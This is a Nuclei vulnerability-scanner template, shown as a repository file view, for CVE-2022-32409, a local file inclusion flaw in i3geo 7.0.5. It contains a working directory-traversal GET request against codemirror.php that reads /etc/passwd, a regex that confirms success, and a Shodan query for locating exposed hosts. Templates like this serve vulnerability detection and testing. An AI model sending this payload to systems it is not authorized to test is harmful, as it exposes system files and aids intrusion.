nuclei-templates/cves/2022/CVE-2022-32409.yaml

31 lines
894 B
YAML
Raw Normal View History

2022-07-21 02:30:33 +00:00
id: CVE-2022-32409
info:
name: i3geo - Directory Traversal
author: pikpikcu
severity: critical
description: A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request
reference:
- https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt
2022-07-21 07:44:37 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-32409
metadata:
verified: true
shodan-query: http.html:"i3geo"
2022-07-21 02:30:33 +00:00
tags: cve,cve2022,i3geo,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200